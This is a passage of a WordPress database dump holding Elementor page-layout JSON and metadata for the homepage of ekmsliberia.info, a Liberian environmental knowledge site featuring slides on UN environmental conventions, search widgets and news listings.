later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(28279,4077,'_elementor_version','3.4.0'),(28280,4077,'_elementor_template_type','wp-page'),(28281,4077,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(28283,4077,'_elementor_pro_version','3.3.6'),(28287,4078,'_wp_page_template','default'),(28288,4078,'_elementor_edit_mode','builder'),(28289,4078,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, 